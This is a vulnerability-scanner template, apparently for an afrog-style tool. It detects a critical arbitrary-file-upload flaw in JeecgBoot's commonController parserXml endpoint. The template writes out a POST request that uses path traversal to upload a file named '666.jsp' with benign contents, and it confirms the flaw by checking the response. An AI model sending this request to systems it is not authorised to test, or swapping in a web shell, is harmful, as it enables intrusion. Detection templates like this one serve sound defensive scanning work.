id: jeecgboot-commoncontroller-parserxml-fileupload
info:
name: Jeecgboot commonController parserXml fileupload
severity: critical
author: zan8in
verified: true
tags: jeecgboot,fileupload
created: 2024/04/10
set:
rboundary: randomLowercase(8)
rules:
r0:
request:
method: POST
path: /api/../commonController.do?parserXml
headers:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
Te: trailers
body: "------WebKitFormBoundary{{rboundary}}\r\nContent-Disposition: form-data; name=\"file\"; filename=\"666.jsp\"\r\nContent-Type: application/octet-stream\r\n\r\n111\r\n------WebKitFormBoundary{{rboundary}}--\r\n"
expression: |
response.status == 200 &&
response.body.bcontains(b'"attributes"') &&
response.body.bcontains(b'"obj"') &&
response.body.bcontains(b'"jsonStr"') &&
response.body.bcontains(b'"success"')
expression: r0()